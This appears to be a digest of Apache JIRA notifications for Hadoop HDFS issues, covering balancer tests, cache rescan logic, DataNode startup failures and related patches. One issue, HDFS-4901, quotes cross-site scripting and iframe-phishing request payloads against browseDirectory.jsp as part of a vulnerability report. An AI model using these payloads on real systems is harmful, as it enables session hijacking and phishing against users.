> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few consts that I believe are extraneous, and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above. This was in the getJNIEnv 
> function in hdfsJniHelper.c.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Benoy Antony (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benoy Antony updated HDFS-6798:
---

Status: Patch Available  (was: Open)

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer checks whether a block's location is a known data node, but the 
> variable it uses for the check is wrong. This issue was fixed in HDFS-6364.
> There was no easy way to unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Benoy Antony (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benoy Antony updated HDFS-6798:
---

Attachment: HDFS-6798.patch

The attached patch adds the unit test for HDFS-6364.

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer checks whether a block's location is a known data node, but the 
> variable it uses for the check is wrong. This issue was fixed in HDFS-6364.
> There was no easy way to unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Benoy Antony (JIRA)
Benoy Antony created HDFS-6798:
--

 Summary: Add test case for incorrect data node condition during 
balancing
 Key: HDFS-6798
 URL: https://issues.apache.org/jira/browse/HDFS-6798
 Project: Hadoop HDFS
  Issue Type: Improvement
  Components: balancer
Affects Versions: 2.4.1
Reporter: Benoy Antony
Assignee: Benoy Antony


The Balancer checks whether a block's location is a known data node, but the 
variable it uses for the check is wrong. This issue was fixed in HDFS-6364.
There was no easy way to unit test it at that time. Since HDFS-6441 enables 
one to simulate this case, it was decided to add the unit test once HDFS-6441 
is resolved.




--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Resolved] (HDFS-6786) Fix potential issue of cache refresh interval

2014-07-31 Thread Colin Patrick McCabe (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6786?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Colin Patrick McCabe resolved HDFS-6786.


Resolution: Not a Problem

> Fix potential issue of cache refresh interval
> -
>
> Key: HDFS-6786
> URL: https://issues.apache.org/jira/browse/HDFS-6786
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 2.4.0
>Reporter: Yi Liu
>Assignee: Yi Liu
>
> In {{CacheReplicationMonitor}}, the following code checks every interval ms 
> whether a rescan is needed; if a rescan takes n ms, it subtracts n ms from 
> the interval. But if the delta is <= 0, it breaks out and starts a rescan, 
> which creates a potential issue: if the user sets the interval to a small 
> value, or a rescan finishes only after exceeding the interval, rescans will 
> happen in a loop. Furthermore, {{delta <= 0}} should not be what triggers 
> the rescan, since when a rescan is needed, {{needsRescan}} is set.
> {code}
>  while (true) {
> if (shutdown) {
>   LOG.info("Shutting down CacheReplicationMonitor");
>   return;
> }
> if (needsRescan) {
>   LOG.info("Rescanning because of pending operations");
>   break;
> }
> long delta = (startTimeMs + intervalMs) - curTimeMs;
> if (delta <= 0) {
>   LOG.info("Rescanning after " + (curTimeMs - startTimeMs) +
>   " milliseconds");
>   break;
> }
> doRescan.await(delta, TimeUnit.MILLISECONDS);
> curTimeMs = Time.monotonicNow();
>   }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6786) Fix potential issue of cache refresh interval

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6786?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081513#comment-14081513
 ] 

Colin Patrick McCabe commented on HDFS-6786:


I agree with Andrew that a minimum interval seems unnecessary here.  Sysadmins 
rarely adjust this value, and if they do, we assume that they know what they're 
doing... similar to a lot of the other tunables.

The only case I can recall where we set a minimum is in block size.  But we did 
that because block size can be controlled by the client creating a file (you 
don't need to be the sysadmin adjusting a configuration to set the block size).

I'm going to close this one out since it's working as intended.

> Fix potential issue of cache refresh interval
> -
>
> Key: HDFS-6786
> URL: https://issues.apache.org/jira/browse/HDFS-6786
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 2.4.0
>Reporter: Yi Liu
>Assignee: Yi Liu
>
> In {{CacheReplicationMonitor}}, the following code checks every interval ms 
> whether a rescan is needed; if a rescan takes n ms, it subtracts n ms from 
> the interval. But if the delta is <= 0, it breaks out and starts a rescan, 
> which creates a potential issue: if the user sets the interval to a small 
> value, or a rescan finishes only after exceeding the interval, rescans will 
> happen in a loop. Furthermore, {{delta <= 0}} should not be what triggers 
> the rescan, since when a rescan is needed, {{needsRescan}} is set.
> {code}
>  while (true) {
> if (shutdown) {
>   LOG.info("Shutting down CacheReplicationMonitor");
>   return;
> }
> if (needsRescan) {
>   LOG.info("Rescanning because of pending operations");
>   break;
> }
> long delta = (startTimeMs + intervalMs) - curTimeMs;
> if (delta <= 0) {
>   LOG.info("Rescanning after " + (curTimeMs - startTimeMs) +
>   " milliseconds");
>   break;
> }
> doRescan.await(delta, TimeUnit.MILLISECONDS);
> curTimeMs = Time.monotonicNow();
>   }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6784) Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls setNeedsRescan multiple times.

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6784?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081506#comment-14081506
 ] 

Colin Patrick McCabe commented on HDFS-6784:


I thought about this a little more, and I posted a patch on HDFS-6783 that I 
think solves this problem.  Check it out.

Sorry for all the confusion... sometimes it's tough to reason about these 
locking issues.

> Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls 
> setNeedsRescan multiple times.
> ---
>
> Key: HDFS-6784
> URL: https://issues.apache.org/jira/browse/HDFS-6784
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6784.001.patch
>
>
> In the HDFS CacheReplicationMonitor, a rescan is expensive. Sometimes 
> {{setNeedsRescan}} is called multiple times for one FS op; for example, 
> FSNamesystem#modifyCacheDirective calls it 3 times. In the monitor thread of 
> CacheReplicationMonitor, if it sees that {{needsRescan}} is true, a rescan 
> happens, but {{needsRescan}} is set to false before the real scan starts. 
> Meanwhile, the 2nd or 3rd call to {{setNeedsRescan}} may set {{needsRescan}} 
> back to true. So after the scan finishes, the next loop triggers a new 
> rescan that is not necessary at all; rescanning twice is inefficient.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081502#comment-14081502
 ] 

Colin Patrick McCabe commented on HDFS-6783:


Hi Yi.

I didn't like v2 of the patch since I felt like 2 and 1 were magic numbers, not 
obvious when reading the code.  I also feel like having all these flags and 
conditions and suchlike is kind of brittle.

I would rather just have three numbers: the number of the last completed scan, 
the number of the scan in progress, and the number of the next scan that has 
been requested.  The nice thing about this approach is that if we call 
{{setNeedsRescan}} multiple times in a row during the same scan, it just keeps 
setting {{neededScanCount}} to the same value.  This also doesn't make any 
assumptions about whether we hold the FSN lock for the entire duration of  
{{CacheReplicationMonitor#rescan}}.

I posted a v3 of the patch that implements this.  I think this also solves the 
issue in HDFS-6784.

I apologize for posting my patch on your JIRA but I really felt like this was 
an awesome solution.  Let me know what you think!
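The three-number scheme described above can be sketched roughly as follows. This is an illustrative sketch only; the field names (completedScanCount, curScanCount, neededScanCount) and method shapes are assumptions for the example, not necessarily what the v3 patch actually does.

```java
// Sketch of the three-counter rescan bookkeeping: one counter for the last
// completed scan, one for the scan in progress (-1 if none), and one for
// the highest scan number anyone has requested.
public class RescanCounters {
  private long completedScanCount = 0; // number of the last finished scan
  private long curScanCount = -1;      // number of the in-progress scan, or -1
  private long neededScanCount = 0;    // number of the next requested scan

  // Called by FS operations. Repeated calls during the same scan keep
  // assigning the same target value, so one extra scan covers them all.
  public synchronized void setNeedsRescan() {
    neededScanCount = Math.max(completedScanCount, curScanCount) + 1;
  }

  public synchronized boolean needsRescan() {
    return neededScanCount > completedScanCount;
  }

  // Monitor thread: mark a scan started, then mark it completed.
  public synchronized void beginScan() {
    curScanCount = completedScanCount + 1;
  }

  public synchronized void endScan() {
    completedScanCount = curScanCount;
    curScanCount = -1;
  }
}
```

Note how an op arriving mid-scan requests exactly one follow-up scan (curScanCount + 1), while any number of setNeedsRescan calls between scans collapse into a single pending scan.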

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In the monitor thread, needsRescan is set to false before the real scan 
> starts, so {{waitForRescanIfNeeded}} will return at the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-4901) Site Scripting and Phishing Through Frames in browseDirectory.jsp

2014-07-31 Thread Allen Wittenauer (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-4901?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081493#comment-14081493
 ] 

Allen Wittenauer commented on HDFS-4901:


At this point, there is unlikely to be another 1.x release, given that the 
last one will be a year old tomorrow.

> Site Scripting and Phishing Through Frames in browseDirectory.jsp
> -
>
> Key: HDFS-4901
> URL: https://issues.apache.org/jira/browse/HDFS-4901
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: security, webhdfs
>Affects Versions: 1.2.1
>Reporter: Jeffrey E  Rodriguez
>Assignee: Vivek Ganesan
>Priority: Blocker
> Attachments: HDFS-4901.patch, HDFS-4901.patch.1, 
> HDFS-4901_branch-1.2.patch
>
>   Original Estimate: 24h
>  Time Spent: 24h
>  Remaining Estimate: 0h
>
> It is possible to steal or manipulate user sessions and cookies, which 
> might be used to impersonate a legitimate user, allowing an attacker to 
> view or alter user records and to perform transactions as that user.
> e.g.
> GET /browseDirectory.jsp? dir=%2Fhadoop'"/>alert(759) 
> &namenodeInfoPort=50070
> Also;
> Phishing Through Frames
> Try:
> GET /browseDirectory.jsp? 
> dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
> &namenodeInfoPort=50070 HTTP/1.1
> Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
> Accept-Language: en-US
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-4916) DataTransfer may mask the IOException during block transfering

2014-07-31 Thread Allen Wittenauer (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-4916?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Allen Wittenauer updated HDFS-4916:
---

Priority: Critical  (was: Blocker)

> DataTransfer may mask the IOException during block transfering
> --
>
> Key: HDFS-4916
> URL: https://issues.apache.org/jira/browse/HDFS-4916
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.0.4-alpha, 2.0.5-alpha
>Reporter: Zesheng Wu
>Priority: Critical
> Attachments: 4916.v0.patch
>
>
> When a new datanode is added to the pipeline, the client triggers the block 
> transfer process. In the current implementation, the source datanode calls 
> the run() method of DataTransfer to transfer the block; this method masks 
> any IOException raised during the transfer, so the client does not realize 
> the transfer failed and mistakes the failed transfer for a successful one.
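One way to surface the failure described above is to record the exception raised in the transfer thread and rethrow it to the caller rather than only logging it. The sketch below is illustrative, not the actual DataNode code; in the sketch the Runnable wraps the IOException in a RuntimeException, which the real DataTransfer would not need to do.

```java
import java.io.IOException;
import java.util.concurrent.atomic.AtomicReference;

// Sketch: run a transfer body on a thread, capture any IOException it
// raised, and propagate it to the caller instead of masking it.
public class TransferSketch {
  static void transferAndCheck(Runnable transferBody) throws IOException {
    AtomicReference<IOException> failure = new AtomicReference<>();
    Thread t = new Thread(() -> {
      try {
        transferBody.run();
      } catch (RuntimeException e) {
        // Runnable cannot throw checked exceptions, so the sketch wraps
        // the IOException and unwraps it here.
        if (e.getCause() instanceof IOException) {
          failure.set((IOException) e.getCause());
        } else {
          throw e;
        }
      }
    });
    t.start();
    try {
      t.join();
    } catch (InterruptedException e) {
      Thread.currentThread().interrupt();
    }
    IOException ioe = failure.get();
    if (ioe != null) {
      throw ioe; // propagate the transfer failure instead of masking it
    }
  }
}
```

The caller (ultimately the client driving the pipeline recovery) can then react to the failed transfer instead of treating it as successful.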



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-5185) DN fails to startup if one of the data dir is full

2014-07-31 Thread Allen Wittenauer (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-5185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Allen Wittenauer updated HDFS-5185:
---

Priority: Critical  (was: Blocker)

> DN fails to startup if one of the data dir is full
> --
>
> Key: HDFS-5185
> URL: https://issues.apache.org/jira/browse/HDFS-5185
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Reporter: Vinayakumar B
>Assignee: Vinayakumar B
>Priority: Critical
> Attachments: HDFS-5185.patch
>
>
> DataNode fails to start up if one of the configured data dirs is out of 
> space. It fails with the following exception:
> {noformat}2013-09-11 17:48:43,680 FATAL 
> org.apache.hadoop.hdfs.server.datanode.DataNode: Initialization failed for 
> block pool Block pool  (storage id 
> DS-308316523-xx.xx.xx.xx-64015-1378896293604) service to /nn1:65110
> java.io.IOException: Mkdirs failed to create 
> /opt/nish/data/current/BP-123456-1234567/tmp
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.BlockPoolSlice.<init>(BlockPoolSlice.java:105)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeImpl.addBlockPool(FsVolumeImpl.java:216)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeList.addBlockPool(FsVolumeList.java:155)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsDatasetImpl.addBlockPool(FsDatasetImpl.java:1593)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataNode.initBlockPool(DataNode.java:834)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPOfferService.verifyAndSetNamespaceInfo(BPOfferService.java:311)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.connectToNNAndHandshake(BPServiceActor.java:217)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.run(BPServiceActor.java:660)
> at java.lang.Thread.run(Thread.java:662)
> {noformat}
> It should continue to start up with the other available data dirs.
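The tolerate-and-continue behavior the report asks for can be sketched as below: try each data dir, collect failures, and abort only when more volumes fail than a configured tolerance (HDFS has a dfs.datanode.failed.volumes.tolerated setting for volume failures; this sketch is illustrative, not the actual fix).

```java
import java.io.File;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

// Sketch: initialize each configured volume, skipping ones that cannot be
// created (e.g. disk full), and fail only past a configured tolerance.
public class VolumeInitSketch {
  static List<File> initVolumes(List<File> dataDirs, int failedVolumesTolerated)
      throws IOException {
    List<File> usable = new ArrayList<>();
    int failed = 0;
    for (File dir : dataDirs) {
      // mkdirs() returns false when the dir cannot be created
      if (dir.isDirectory() || dir.mkdirs()) {
        usable.add(dir);
      } else {
        failed++; // record the bad volume but keep going
      }
    }
    if (failed > failedVolumesTolerated) {
      throw new IOException("Too many failed volumes: " + failed);
    }
    return usable;
  }
}
```

With this shape, a single full or unwritable data dir is skipped at startup instead of aborting the whole DataNode.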



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Colin Patrick McCabe (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Colin Patrick McCabe updated HDFS-6783:
---

Attachment: HDFS-6783.003.patch

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In the monitor thread, needsRescan is set to false before the real scan 
> starts, so {{waitForRescanIfNeeded}} will return at the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)

